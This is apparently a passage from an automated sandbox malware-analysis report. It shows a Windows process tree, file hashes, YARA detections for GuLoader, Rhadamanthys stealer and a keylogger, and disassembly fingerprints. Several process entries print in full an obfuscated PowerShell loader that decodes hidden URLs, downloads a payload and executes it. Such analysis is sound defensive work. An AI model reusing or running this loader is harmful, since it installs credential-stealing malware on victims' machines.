aeSk. fD Uo wOpn Cl,ioDeaL d KF,ei el SeD (Bo$SaEFel li,ikNas Ei nr DeCorBesbe,In$ SBotFieM.mFin Pi bnDdg osH.fApu PlLedObtOt)';$Stemningsfuldt=$Iodines;cleavingly (Symboltabeller 'Sm$ AGK.lAnOC,bG.A.rl u:AfW IeMoe ukMdeChN eD HUS DseFAal,ru gRetUnEHar Tn fe IS t= E(erTC E SUnTp -Alp rAO,TFohC Vi$,rS nTKie SM Bn aIUnnEggFis.oFwaur LAfd T.a)');while (!$Weekendudflugternes) {cleavingly (Symboltabeller ' G$GegHelB,o ,b a KlAn:TrF,no De,mt Go arSp= u$UnAfds obMioAdl oialtane') ;cleavingly $Pastina;cleavingly (Symboltabeller 'BjS iTTaAsurFitT -StSE L EovE.oP,o Se4');cleavingly (Symboltabeller 'Go$NoGL lFlOPrb LAGalS : awBie Re .k IEkoN OdG U ,dKvfOvlSpUNoG.itTjePiRA NTyeD,smi=M,( ft.pe SsTrT - CpF.AKot hSp Fe$Mus TopeW,M ,N.kIV.NPlGV.SAlfPhu kLGrDCaT o)') ;cleavingly (Symboltabeller 'Sy$ Dg rL ao,mBB.aT Lst:deuT nChm .uArfSuF SlSne aSTr= i$ sgGlLSiO.abS,a Tl o: KaR LBeEUfTPaH MoPaP.rtIneU IEtsSk+Pe+No%Fl$G,V eA aU bExeKiNsafHuAUnbEkrB i nKSy.dycOvO uprN ,t') ;$Eliksirers=$Vaabenfabrik[$Unmuffles]}$Velfunderede=317450;$autoriserendes=28180;cleavingly (Symboltabeller ' w$PlGXyLAmO eBBlabol n:Mef nrFadZaiLsG MbMoY ogO gMieUdTB, Vi= U SegB,EbetCh-UoC uoVeNQuTB e,unF.t i Fi$P sAntAtEU MTen oiFoN SGSaSAffU,UMylInDNot');cleavingly (Symboltabeller 'Ud$opgSplCroPebHjaUdlMe: TE np HoWhc HhB.e N=Sy Vi[DeS,eyR sMatNee.mmFn.,pCRioInnRevReeSarP t ]Ca:Sn:K F arNao PmU B oa asRyeMi6B 4 aS BtIprRoi unAng D( a$.eF FrTid .i gPrb,yyAfgSug be Pt s)');cleavingly (Symboltabeller 'T.$ .g .lT.OInbEsaQul o: eFSpl KJ VL usBeGLrR,iS u D =Re D[ osHeYI sS TSkE mBa. yT.nED x Ct E. ae NReCReOEgdS I DN eG,e]H,:C.:R ATysB CNaislIQu.AdGP eB,TVesSaTElR ,I,enSygte( R$ WEHop moN.c .HDiEB )');cleavingly (Symboltabeller 'Fe$Hog .lUnO Fb ea FLOu:KoBKaARet rtC,aRaLCoineaFo=.b$ReFSulUnJ iL ksDeG ,RG S F. ps fuC.b ysAltKoR,iIP.nTyGLo(.o$ToVUneFuLdeFTaU SnG dHaESorAkEFaDFoERe, ,$Una lUigT o Vr eI Ps SEM RPeeBrn HdAse.rS,a)');cleavingly $Battalia;"
                                                                                                                                      Imagebase:0x7ff6e3d50000
                                                                                                                                      File size:452'608 bytes
                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2340099936.0000020FC41F2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:6
                                                                                                                                      Start time:13:27:07
                                                                                                                                      Start date:18/12/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:10
                                                                                                                                      Start time:13:27:18
                                                                                                                                      Start date:18/12/2024
                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                      Imagebase:0x7ff7403e0000
                                                                                                                                      File size:55'320 bytes
                                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      General

                                                                                                                                      Target ID:12
                                                                                                                                      Start time:13:27:18
                                                                                                                                      Start date:18/12/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Blodudtrdningen='Afhndede';;$noncooperator='Cryophorus';;$Thalassinian='Josephina';;$Maste193='Forslvendes';;$Downthrust=$host.Name; function Symboltabeller($blowtube){If ($Downthrust) {$Morphogenic='Ukammerater';$overstegne=2;$Smugleriernes=$overstegne}do{$Usaglige+=$blowtube[$Smugleriernes];$Smugleriernes+=3} until(!$blowtube[$Smugleriernes])$Usaglige}function cleavingly($Ethnicon){ .($Gudmors) ($Ethnicon)}$Medioanterior=Symboltabeller 'ben EExtTw.F W';$Medioanterior+=Symboltabeller 'ReeUnbLacb,lO,i keBrn FT';$Forstdelsernes=Symboltabeller 'RyM Ro Dz.riOpl,alDeaAm/';$Udlodning=Symboltabeller 'P T.klBls F1Se2';$Rival='N [,in Be STTr.FjSasE MRGivmoISaCNeE MPBeO CIBoNAnTTiME a lnEdApaGDoEcor,l] : D: Ss eMoc u KrS i TtSaYFoPB.R SO t po BCKlO,rlF =Vu$ US DDuld Oped eN,eI dNNiG';$Forstdelsernes+=Symboltabeller 'Mo5S .No0Mo t(TiWImi.on Pd oAvwDosO. lyNChTF. p1 e0Me.Af0K,;Ap CoWT iMinSn6 4F ; Unx,a6 u4Ac; l FarGrvGa:.e1ab3U 1In.S 0 F)La LoGU,e KcHokIno l/.u2Sh0 e1Un0Ha0me1 f0Sa1 i KeFIdi ArGre rf Jo nx L/T 1,a3Ac1Ca. ,0';$Hoejkulturer=Symboltabeller ' DUansGnEB RTi- AUdg ,E oN .t';$Eliksirers=Symboltabeller '.oh pt tc,pAnsPl:fe/Ni/ChwInw hwD . atUndSkeSij .bDe.Chc ho Am ./Exew fSk/ STokPriSlf tP eP r nn xeT .ScsChe ea E>Unh FtD,t Np she:Fl/.l/,iw SwBew .O a,krGeeMrcseo ksA aFolaud GaGatAnu SrMie,e.Spi Kt ./ SeEnfPf/ RS.ekEtiInfSutMeeH.r,anAmeAd.V sAne Ia';$Programmeringsskik1=Symboltabeller 'A >';$Gudmors=Symboltabeller ' BIC eH x';$Strudsmaven='Circumscript';$Fastprissystemet='\Even.Lar';cleavingly (Symboltabeller '.a$EsGA.LEpOArbLaaKaL e: ai GoVeD fi Sn .ETrs B=A,$StEBrNU vAp:EmaB pMaPMedC a TT aGu+S $ FE,ABes TSepSirFoiges.es,uYTis.mT teO mS.EK,t');cleavingly (Symboltabeller ' C$anG oLKvOHaBRoa LKv:SpVK A .aPabLoeReNBoFRuATeBDeR AiStKDy=Pr$ rESolazI dKT,S kISkRUnE .R FSCh.SaSnePPrLOpiTetRa( a$AnPSyr rOUbGVirFuaViM.aMSkeFor ei oND.G WSM sR kPriHekTe1 ,)');cleavingly (Symboltabeller $Rival);$Eliksirers=$Vaabenfabrik[0];$portor=(Symboltabeller 'Re$PrG,tLNeoW,BS.AP lF,:.aAFrTDiENol I ,e kR .v eiDeN FdWhUmeER = aNU eNyWIn- koTrbStj,yEBrcMiTDe BesRyy oS.ttr.eA mKa. i$ Bm leLyd SIRaoUlApenA.T eeDir itho r');cleavingly ($portor);cleavingly (Symboltabeller 'S $.iaVitBaeMilMiitoeWirInvEgiUnnTidDuuPae e. HS eS a dpreScr ,s S[Wu$VrHRuo,pe jH,kscu ul ktHyuenrU eD r e].r=An$PlFP oBirPasAdtKad.be ElBisA eNerL nTeeFus');$Pastina=Symboltabeller 'Ve$Sea etT,e ll oi,oeMirRuvKaiMin TdOpu aeSk. fD Uo wOpn Cl,ioDeaL d KF,ei el SeD (Bo$SaEFel li,ikNas Ei nr DeCorBesbe,In$ SBotFieM.mFin Pi bnDdg osH.fApu PlLedObtOt)';$Stemningsfuldt=$Iodines;cleavingly (Symboltabeller 'Sm$ AGK.lAnOC,bG.A.rl u:AfW IeMoe ukMdeChN eD HUS DseFAal,ru gRetUnEHar Tn fe IS t= E(erTC E SUnTp -Alp rAO,TFohC Vi$,rS nTKie SM Bn aIUnnEggFis.oFwaur LAfd T.a)');while (!$Weekendudflugternes) {cleavingly (Symboltabeller ' G$GegHelB,o ,b a KlAn:TrF,no De,mt Go arSp= u$UnAfds obMioAdl oialtane') ;cleavingly $Pastina;cleavingly (Symboltabeller 'BjS iTTaAsurFitT -StSE L EovE.oP,o Se4');cleavingly (Symboltabeller 'Go$NoGL lFlOPrb LAGalS : awBie Re .k IEkoN OdG U ,dKvfOvlSpUNoG.itTjePiRA NTyeD,smi=M,( ft.pe SsTrT - CpF.AKot hSp Fe$Mus TopeW,M ,N.kIV.NPlGV.SAlfPhu kLGrDCaT o)') ;cleavingly (Symboltabeller 'Sy$ Dg rL ao,mBB.aT Lst:deuT nChm .uArfSuF SlSne aSTr= i$ sgGlLSiO.abS,a Tl o: KaR LBeEUfTPaH MoPaP.rtIneU IEtsSk+Pe+No%Fl$G,V eA aU bExeKiNsafHuAUnbEkrB i nKSy.dycOvO uprN ,t') ;$Eliksirers=$Vaabenfabrik[$Unmuffles]}$Velfunderede=317450;$autoriserendes=28180;cleavingly (Symboltabeller ' w$PlGXyLAmO eBBlabol n:Mef nrFadZaiLsG MbMoY ogO gMieUdTB, Vi= U SegB,EbetCh-UoC uoVeNQuTB e,unF.t i Fi$P sAntAtEU MTen oiFoN SGSaSAffU,UMylInDNot');cleavingly (Symboltabeller 'Ud$opgSplCroPebHjaUdlMe: TE np HoWhc HhB.e N=Sy Vi[DeS,eyR sMatNee.mmFn.,pCRioInnRevReeSarP t ]Ca:Sn:K F arNao PmU B oa asRyeMi6B 4 aS BtIprRoi unAng D( a$.eF FrTid .i gPrb,yyAfgSug be Pt s)');cleavingly (Symboltabeller 'T.$ .g .lT.OInbEsaQul o: eFSpl KJ VL usBeGLrR,iS u D =Re D[ osHeYI sS TSkE mBa. yT.nED x Ct E. ae NReCReOEgdS I DN eG,e]H,:C.:R ATysB CNaislIQu.AdGP eB,TVesSaTElR ,I,enSygte( R$ WEHop moN.c .HDiEB )');cleavingly (Symboltabeller 'Fe$Hog .lUnO Fb ea FLOu:KoBKaARet rtC,aRaLCoineaFo=.b$ReFSulUnJ iL ksDeG ,RG S F. ps fuC.b ysAltKoR,iIP.nTyGLo(.o$ToVUneFuLdeFTaU SnG dHaESorAkEFaDFoERe, ,$Una lUigT o Vr eI Ps SEM RPeeBrn HdAse.rS,a)');cleavingly $Battalia;"
                                                                                                                                      Imagebase:0x7b0000
                                                                                                                                      File size:433'152 bytes
                                                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000C.00000002.2587069409.0000000008A10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000C.00000002.2557862316.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000C.00000002.2587424244.000000000C6DB000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:13
                                                                                                                                      Start time:13:27:18
                                                                                                                                      Start date:18/12/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:19
                                                                                                                                      Start time:13:27:42
                                                                                                                                      Start date:18/12/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                                                      Imagebase:0x300000
                                                                                                                                      File size:59'904 bytes
                                                                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000013.00000003.2708452120.0000000024620000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000013.00000003.2708661877.0000000024840000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000013.00000003.2704689744.0000000002540000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000013.00000003.2719430449.0000000024020000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:22
                                                                                                                                      Start time:13:27:59
                                                                                                                                      Start date:18/12/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Windows\System32\svchost.exe"
                                                                                                                                      Imagebase:0xb90000
                                                                                                                                      File size:46'504 bytes
                                                                                                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000016.00000003.2712310012.0000000004F60000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000016.00000003.2709177603.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000016.00000003.2712594384.0000000005180000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000016.00000002.2802648641.0000000003040000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:23
                                                                                                                                      Start time:13:28:08
                                                                                                                                      Start date:18/12/2024
                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Windows\System32\svchost.exe"
                                                                                                                                      Imagebase:0x7ff7403e0000
                                                                                                                                      File size:55'320 bytes
                                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:27
                                                                                                                                      Start time:13:28:20
                                                                                                                                      Start date:18/12/2024
                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr83C0.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/a52e5cd8/20442955"
                                                                                                                                      Imagebase:0x7ff684c40000
                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:28
                                                                                                                                      Start time:13:28:21
                                                                                                                                      Start date:18/12/2024
                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2328 --field-trial-handle=2332,i,10028709547936440876,11237033712603791372,262144 /prefetch:8
                                                                                                                                      Imagebase:0x7ff684c40000
                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:29
                                                                                                                                      Start time:13:28:22
                                                                                                                                      Start date:18/12/2024
                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr8AD6.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/a52e5cd8/a1d56f56"
                                                                                                                                      Imagebase:0x7ff715da0000
                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                      MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:30
                                                                                                                                      Start time:13:28:23
                                                                                                                                      Start date:18/12/2024
                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2040,i,14070715780729818373,9332717717908022524,262144 /prefetch:3
                                                                                                                                      Imagebase:0x7ff715da0000
                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                      MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:34
                                                                                                                                      Start time:13:28:41
                                                                                                                                      Start date:18/12/2024
                                                                                                                                      Path:C:\Program Files\Windows Media Player\wmpshare.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files\Windows Media Player\wmpshare.exe"
                                                                                                                                      Imagebase:0x7ff65d480000
                                                                                                                                      File size:106'496 bytes
                                                                                                                                      MD5 hash:A89F75B51EAADA8C97F8D674B3EDB2F2
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:false

                                                                                                                                      General

                                                                                                                                      Target ID:35
                                                                                                                                      Start time:13:28:43
                                                                                                                                      Start date:18/12/2024
                                                                                                                                      Path:C:\Windows\System32\dllhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Windows\system32\dllhost.exe"
                                                                                                                                      Imagebase:0x7ff642ec0000
                                                                                                                                      File size:21'312 bytes
                                                                                                                                      MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:false

                                                                                                                                      Disassembly

                                                                                                                                      Reset < >

                                                                                                                                        Executed Functions

                                                                                                                                        Function 00007FFD3423A726 Relevance: .5, Instructions: 545COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2351199638.00007FFD34230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34230000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_7ffd34230000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 75b87d52af4eafff1763fd180bf50f52b5d91a9863d3b5c929e6a07f313acaae
                                                                                                                                        • Instruction ID: ce5cd65fdc08dd9a1d5a9395f840c864889320a9589534b6db1438cd82065176
                                                                                                                                        • Opcode Fuzzy Hash: 75b87d52af4eafff1763fd180bf50f52b5d91a9863d3b5c929e6a07f313acaae
                                                                                                                                        • Instruction Fuzzy Hash: 41128330A18A8D8FEBA8DF28C8657F977E1FF55310F04427AD84DD7291CB39A9458B41
                                                                                                                                        Function 00007FFD3423B8E2 Relevance: .5, Instructions: 524COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2351199638.00007FFD34230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34230000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_7ffd34230000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: bf6daf9d1f616ab9a38fa18f1d3ecba0bbdfd88015f07cdd7a479018588aa4df
                                                                                                                                        • Instruction ID: 28c17f92d5211e716b233767f91a9fb0ede22e9ce6c518e62cf7beadffedbe8a
                                                                                                                                        • Opcode Fuzzy Hash: bf6daf9d1f616ab9a38fa18f1d3ecba0bbdfd88015f07cdd7a479018588aa4df
                                                                                                                                        • Instruction Fuzzy Hash: 15029830A08A4D8FEBA4DF18C8A57F93BE1FF55311F04427AE84DCB192CE39A5458781
                                                                                                                                        Function 00007FFD3423CF85 Relevance: 4.4, Strings: 3, Instructions: 684COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2351199638.00007FFD34230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34230000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_7ffd34230000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 8F4$@F4$F4
                                                                                                                                        • API String ID: 0-2468754269
                                                                                                                                        • Opcode ID: 4341f4ef55fd8b3389eeef8bd1093d50f887e1275a181f3be208dd44be5d2f49
                                                                                                                                        • Instruction ID: 6ece82a1cf09f6a7d33c82e4a40b2dccb1ee0544f0b90743b456f0e6f0c8f814
                                                                                                                                        • Opcode Fuzzy Hash: 4341f4ef55fd8b3389eeef8bd1093d50f887e1275a181f3be208dd44be5d2f49
                                                                                                                                        • Instruction Fuzzy Hash: 5E327231A18A4D8FDF98DF58C4A5AA9B7F1FF99300F140169D449E7296CA35F881CB81
                                                                                                                                        Function 00007FFD3430525D Relevance: 1.6, Strings: 1, Instructions: 308COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2352162775.00007FFD34300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_7ffd34300000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: @_H
                                                                                                                                        • API String ID: 0-518063247
                                                                                                                                        • Opcode ID: f2e8a8a553ee01e03488fbc2c4726a01a00cc397f91dd61437d2a1c6ae250299
                                                                                                                                        • Instruction ID: 89288b78cae4bd61bc3ecfca78c03148a388e7b5a9abe8e6efed33e4a37cdf68
                                                                                                                                        • Opcode Fuzzy Hash: f2e8a8a553ee01e03488fbc2c4726a01a00cc397f91dd61437d2a1c6ae250299
                                                                                                                                        • Instruction Fuzzy Hash: 50914862B0DA8A0FE7D5EB2858A56B97BD1EF56310B5802FAD54EC71D3DD28AC01C341
                                                                                                                                        Function 00007FFD3430A0DE Relevance: 1.3, Strings: 1, Instructions: 57COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2352162775.00007FFD34300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_7ffd34300000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: QG4
                                                                                                                                        • API String ID: 0-3635243142
                                                                                                                                        • Opcode ID: 5c1b975ebc2b440d0b8140b71b3b2abc79b83854431b6f9d738aa92000e32ec9
                                                                                                                                        • Instruction ID: c06ce9c570e42fa21009699d7b3c02482d71ffb23716895a9cbf3fd187600076
                                                                                                                                        • Opcode Fuzzy Hash: 5c1b975ebc2b440d0b8140b71b3b2abc79b83854431b6f9d738aa92000e32ec9
                                                                                                                                        • Instruction Fuzzy Hash: 4E11A333B0E7850FEB59BB5868A22ECB7A1FF56314F0402BAD09D97093DE282C489745
                                                                                                                                        Function 00007FFD3430A8EE Relevance: 1.3, Strings: 1, Instructions: 57COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2352162775.00007FFD34300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_7ffd34300000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: XRG4
                                                                                                                                        • API String ID: 0-3729338360
                                                                                                                                        • Opcode ID: f8c85722018fc2896eccd23c7680898c5aa1e383e61720a0c7e8754c0b642532
                                                                                                                                        • Instruction ID: 8d9924a7bf8764f430ca3ff92dc653d790bd5ffe2543572ac406e6927a3054ca
                                                                                                                                        • Opcode Fuzzy Hash: f8c85722018fc2896eccd23c7680898c5aa1e383e61720a0c7e8754c0b642532
                                                                                                                                        • Instruction Fuzzy Hash: D4119433B0D7890BE755FB5858A22ACB7A1EF56314F0402BAD08D97193DA292C498745
                                                                                                                                        Function 00007FFD343087A5 Relevance: .8, Instructions: 769COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2352162775.00007FFD34300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_7ffd34300000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 0dad98d154087ae5adcac4a5a98e708014e9a61c9a2aca4a73a13d3c770c9f2e
                                                                                                                                        • Instruction ID: 440dfda6b9722e0e4167992c8581a992a83333dacdb154b054ac040df20a120a
                                                                                                                                        • Opcode Fuzzy Hash: 0dad98d154087ae5adcac4a5a98e708014e9a61c9a2aca4a73a13d3c770c9f2e
                                                                                                                                        • Instruction Fuzzy Hash: 3622F831B4DB894FE799AB2C48A55757BE1EF97210B1402BFD18EC7193DE29AC06C381
                                                                                                                                        Function 00007FFD3423B4F6 Relevance: .4, Instructions: 382COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
